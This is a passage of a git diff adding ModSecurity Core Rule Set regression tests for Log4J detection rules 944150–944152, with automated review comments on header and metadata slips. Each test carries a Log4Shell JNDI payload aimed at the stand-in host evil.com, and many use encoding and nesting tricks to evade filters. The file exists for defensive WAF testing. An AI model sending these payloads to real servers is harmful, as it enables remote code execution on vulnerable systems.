+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests ${jndi:ldap://evil.com/webshell}
+ method: GET
+ port: 80
+ uri: /
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-3
+ desc: Log4J exploit in XML code
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/xml
+ method: POST
+ port: 80
+ uri: /
+ data:
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-4
+ desc: Log4J exploit in XML code
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/xml
+ method: POST
+ port: 80
+ uri: /
+ data: "${jndi:ldap://evil.com/webshell}"
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-5
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-6
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-7
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}}
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-8
+ desc: Log4J exploit on arg foo, with Unicode escape encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=$\u007Bjndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-9
+ desc: Log4J exploit on JSON with URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-10
+ desc: Log4J exploit on JSON with Unicode escape evasion, uppercase
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-11
+ desc: Log4J exploit on JSON with Unicode escape evasion, lowercase
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-12
+ desc: Log4J exploit on JSON with named HTML entity evasion, lower case
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "${jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-13
+ desc: Log4J exploit on JSON with named HTML entity evasion, upper case
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-14
+ desc: Log4J exploit on JSON with numeric HTML entity evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "${jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-15
+ desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-16
+ desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-17
+ desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-18
+ desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-19
+ desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-20
+ desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-21
+ desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-22
+ desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-23
+ desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: '${jndi:ldap://evil.om/w}'
+ Content-Type: text/html
+ method: GET
+ port: 80
+ uri: /
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-24
+ desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
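Review bot: `meta.description` is the literal placeholder `"Description"` here and again in 944151.yaml and 944152.yaml; a one-line summary such as `description: "Log4J / JNDI lookup payloads, including encoding evasions"` would make each file self-describing. The header comment says this file and 944151.yaml must be kept in sync, yet 944151.yaml and 944152.yaml in this same commit add tests 25 and 26 that have no counterpart here; if the sibling rules are meant to be supersets, the comment should say so, e.g. `# 944151 and 944152 must fire on every case listed here; they may cover more.`. As rendered on this page the `data:` value of 944150-3 is empty, which may be an artefact of how the page was extracted (an XML body with angle brackets); if it really is empty in the committed file, the request carries nothing for the rule to match and the `log_contains` expectation would fail, so it is worth checking.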
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml
new file mode 100644
index 0000000000..20b0f6209e
--- /dev/null
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml
@@ -0,0 +1,431 @@
+---
+# NOTE: Please keep these tests in sync with 944151.yaml.
+# 944151 should detect the same things as 944151.
+meta:
+ author: "dune73, Max Leske"
+ enabled: true
+ name: "944151.yaml"
+ description: "Description"
+tests:
+ - test_title: 944151-1
+ desc: Log4J exploit on arg foo
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${jndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-2
+ desc: Log4J exploit on User-Agent
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests ${jndi:ldap://evil.com/webshell}
+ method: GET
+ port: 80
+ uri: /
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-3
+ desc: Log4J exploit in XML code
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/xml
+ method: POST
+ port: 80
+ uri: /
+ data:
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-4
+ desc: Log4J exploit in XML code
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/xml
+ method: POST
+ port: 80
+ uri: /
+ data: "${jndi:ldap://evil.com/webshell}"
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-5
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-6
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-7
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}}
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-8
+ desc: Log4J exploit on arg foo, with Unicode escape encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=$\u007Bjndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-9
+ desc: Log4J exploit on JSON with URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-10
+ desc: Log4J exploit on JSON with Unicode escape evasion, uppercase
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-11
+ desc: Log4J exploit on JSON with Unicode escape evasion, lowercase
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-12
+ desc: Log4J exploit on JSON with named HTML entity evasion, lower case
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "${jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-13
+ desc: Log4J exploit on JSON with named HTML entity evasion, upper case
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-14
+ desc: Log4J exploit on JSON with numeric HTML entity evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "${jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-15
+ desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-16
+ desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-17
+ desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-18
+ desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-19
+ desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-20
+ desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-21
+ desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-22
+ desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-23
+ desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: '${jndi:ldap://evil.om/w}'
+ Content-Type: text/html
+ method: GET
+ port: 80
+ uri: /
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-24
+ desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-25
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}}
+ output:
+ log_contains: id "944151"
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml
new file mode 100644
index 0000000000..44bc144008
--- /dev/null
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml
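Review bot: The header comment refers to this file itself — `# NOTE: Please keep these tests in sync with 944151.yaml.` followed by `# 944151 should detect the same things as 944151.` — while the file it mirrors is 944150.yaml, so the two lines should read `# NOTE: Please keep these tests in sync with 944150.yaml.` and `# 944151 should detect the same things as 944150.`. The same copy-paste slip is in the header of 944152.yaml in this commit (`in sync with 944152.yaml and 944151.yaml` / `same things as 944152 and 944151`), where the first 944152 should likewise be 944150. Since the comment is the only thing telling a future editor which files to update together, a wrong target defeats its purpose.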
@@ -0,0 +1,448 @@
+---
+# NOTE: Please keep these tests in sync with 944152.yaml and 944151.yaml.
+# 944152 should detect the same things as 944152 and 944151.
+meta:
+ author: "dune73, Max Leske"
+ enabled: true
+ name: "944152.yaml"
+ description: "Description"
+tests:
+ - test_title: 944152-1
+ desc: Log4J exploit on arg foo
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${jndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-2
+ desc: Log4J exploit on User-Agent
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests ${jndi:ldap://evil.com/webshell}
+ method: GET
+ port: 80
+ uri: /
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-3
+ desc: Log4J exploit in XML code
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/xml
+ method: POST
+ port: 80
+ uri: /
+ data:
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-4
+ desc: Log4J exploit in XML code
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/xml
+ method: POST
+ port: 80
+ uri: /
+ data: "${jndi:ldap://evil.com/webshell}"
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-5
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-6
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-7
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}}
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-8
+ desc: Log4J exploit on arg foo, with Unicode escape encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=$\u007Bjndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-9
+ desc: Log4J exploit on JSON with URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-10
+ desc: Log4J exploit on JSON with Unicode escape evasion, uppercase
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-11
+ desc: Log4J exploit on JSON with Unicode escape evasion, lowercase
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-12
+ desc: Log4J exploit on JSON with named HTML entity evasion, lower case
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "${jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-13
+ desc: Log4J exploit on JSON with named HTML entity evasion, upper case
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-14
+ desc: Log4J exploit on JSON with numeric HTML entity evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "${jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-15
+ desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
